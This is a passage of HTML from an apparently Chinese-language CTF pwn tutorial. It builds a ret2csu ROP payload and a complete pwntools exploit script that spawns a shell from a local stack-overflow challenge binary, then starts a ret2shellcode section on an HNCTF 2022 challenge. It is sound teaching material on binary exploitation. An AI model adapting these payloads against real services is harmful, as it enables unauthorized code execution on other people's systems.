<\/span><span style=\"color: #81A1C1\">rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">retn<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u7531<code>csu1<\/code>\u4e2d\u5404\u5bc4\u5b58\u5668\u7684\u5bf9\u5e94\u5173\u7cfb\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7<code>csu2<\/code>\u5411\u5bc4\u5b58\u5668\u4e2d\u5b58\u5165\u5982\u4e0b\u6570\u636e\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>rbx<\/code><\/td><td>0<\/td><\/tr><tr><td><code>rbp<\/code><\/td><td>1<\/td><\/tr><tr><td><code>r12<\/code><\/td><td><code>\/bin\/sh<\/code>\u7684\u5730\u5740<\/td><\/tr><tr><td><code>r13<\/code><\/td><td>0<\/td><\/tr><tr><td><code>r14<\/code><\/td><td>0<\/td><\/tr><tr><td><code>r15<\/code><\/td><td><code>execve<\/code>\u7684got\u8868\u5730\u5740<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u7531\u6b64\u53ef\u4ee5\u6784\u9020\u51fa\u5982\u4e0b\u7684payload\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span 
style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>payload = b'\\x00' * 0x10 + b'=Triode='\npayload += p64(csu2)\npayload += p64(0)           # add rsp, 8\npayload += p64(0)           # pop rbx\npayload += p64(1)           # pop rbp\npayload += p64(sh)          # pop r12\npayload += p64(0)           # pop r13\npayload += p64(0)           # pop r14\npayload += p64(execve_got)  # pop r15\npayload += p64(csu1)\npayload += b'\\x00' * 0x38 + p64(main)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" 
style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">10<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">csu2<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># add rsp, 8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: 
#D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\"># pop r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span 
style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">execve_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #616E88\"># pop r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">csu1<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">38<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">main<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u5199\u51fa\u653b\u51fb\u4ee3\u7801\u5982\u4e0b\uff08\u7531\u4e8e\u8d5b\u9898\u73af\u5883\u65e9\u5df2\u5173\u95ed\uff0c\u6545\u8fd9\u91cc\u5728\u672c\u5730\u6253\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 
16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import*\n\np = process(\".\/pwn\")\nelf = ELF(\".\/pwn\")\n\ncsu1 = 0x4013A0\ncsu2 = 0x4013B6\nsh = 0x404090\nmain = 0x401275\nexecve_got = elf.got&#91;\"execve\"&#93;\n\np.sendlineafter(b'The little doll is tired, say goodnight to her~\\n', b'\/bin\/sh\\x00')\n\npayload = b'\\x00' * 0x10 + b'=Triode='\npayload += p64(csu2)\npayload += p64(0)           # add rsp, 8\npayload += p64(0)           # pop rbx\npayload += p64(1)           # pop rbp\npayload += p64(sh)          # pop r12\npayload += p64(0)           # pop r13\npayload += p64(0)           # pop r14\npayload += p64(execve_got)  # pop r15\npayload += p64(csu1)\npayload += b'\\x00' * 0x38 + p64(main)\n\np.sendlineafter(b'What else do you want to do?\\n', payload)\np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 
012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import*<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">process<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">csu1 <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4013A0<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">csu2 <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4013B6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span 
style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">404090<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">main <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">401275<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">execve_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">execve<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">The little doll is tired, say goodnight to her~<\/span><span style=\"color: #EBCB8B\">\\n<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span 
style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">10<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">csu2<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># add rsp, 8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: 
#ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">          <\/span><span style=\"color: #616E88\"># pop r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">           <\/span><span style=\"color: #616E88\"># pop r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">execve_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #616E88\"># pop r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span 
style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">csu1<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">38<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">main<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">What else do you want to do?<\/span><span style=\"color: #EBCB8B\">\\n<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u8fd0\u884c\u53ef\u4ee5\u5f97\u5230shell\uff1a<\/p>\n\n\n<div 
class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-38.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-38.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"424\" height=\"206\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-38.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-171\"  sizes=\"auto, (max-width: 424px) 100vw, 424px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<h2 
class=\"wp-block-heading\">ret2shellcode<\/h2>\n\n\n\n<p>ret2shellcode\u6307\u901a\u8fc7\u6808\u6ea2\u51fa\u63a7\u5236\u7a0b\u5e8f\u6267\u884cshellcode\uff0c\u800cshellcode\u5f80\u5f80\u9700\u8981\u6211\u4eec\u81ea\u5df1\u7f16\u5199\uff0c\u800c\u5728<code>pwntools<\/code>\u4e2d\u53ef\u4ee5\u5229\u7528<code>asm(shellcraft.sh())<\/code>\u8fdb\u884c\u7f16\u5199\uff0c\u5728\u4e00\u4e9b\u60c5\u51b5\u4e0b\u4e5f\u4f1a\u7528\u5230\u4e00\u4e9b\u7279\u6b8a\u7684shellcode\uff0c\u6b64\u65f6\u6211\u4eec\u8981\u5411\u7a0b\u5e8f\u4e2d\u586b\u5145\u53ef\u6267\u884c\u7684\u4ee3\u7801\u3002<\/p>\n\n\n\n<p>\u5728\u6808\u6ea2\u51fa\u7684\u57fa\u7840\u4e0a\uff0c\u82e5\u60f3\u6267\u884cshellcode\uff0c\u5219\u6211\u4eec\u5199\u5165shellcode\u7684\u533a\u57df\u4e00\u5b9a\u8981\u6709\u53ef\u6267\u884c\u6743\u9650\uff08\u4f8b\u5982<code>bss<\/code>\u6bb5\uff0c<code>data<\/code>\u6bb5\uff0c\u6ca1\u6709\u88ab\u4fdd\u62a4\u7684<code>stack<\/code>\u6bb5\u4ee5\u53ca\u53ef\u5199\u53ef\u6267\u884c\u7684<code>heap<\/code>\u6bb5\uff09<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[HNCTF 2022 Week1] ret2shellcode<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/2934\">HNCTF 2022 Week1-ret2shellcode | NSSCTF<\/a><\/p>\n\n\n\n<p>checksec\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-39.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-39.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"228\" height=\"109\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-39.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-172\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u53d1\u73b0\u5806\u6808\u4e0d\u53ef\u6267\u884c\uff0c\u4f46\u662f\u6ca1\u6709\u5176\u4ed6\u4fdd\u62a4\uff0c\u5229\u7528IDA\u6253\u5f00\u540e\u53ef\u4ee5\u770b\u5230main\u51fd\u6570\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-40.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-40.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  